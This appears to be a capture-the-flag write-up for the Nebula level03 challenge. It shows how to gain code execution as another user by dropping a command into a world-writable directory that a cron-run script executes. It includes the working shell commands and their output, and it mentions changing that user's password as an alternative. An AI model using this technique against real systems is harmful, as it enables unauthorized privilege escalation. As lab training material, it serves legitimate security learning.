Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.

We’ll start by examining the files in flag03’s home directory.

level03@nebula:~$ ls -al /home/flag03/
total 6
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh

level03@nebula:~$ cat /home/flag03/writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

Okay, so we have a directory we can write to, and a script that will gladly execute whatever is in that directory.

The easiest way to run the getflag executable would be to put this simple script into the writable.d directory.

level03@nebula:~$ echo "getflag > /tmp/getflag.log" > /home/flag03/writable.d/getflag

Now we wait a few minutes. The cron job is executed every 3 minutes (you can check this by adding a script that runs crontab -l > /tmp/crontab.log or similar).

level03@nebula:~$ cat /tmp/getflag.log
You have successfully executed getflag on a target account

You could also solve this by changing the password of the flag03 user, but that might be a bit more intrusive :)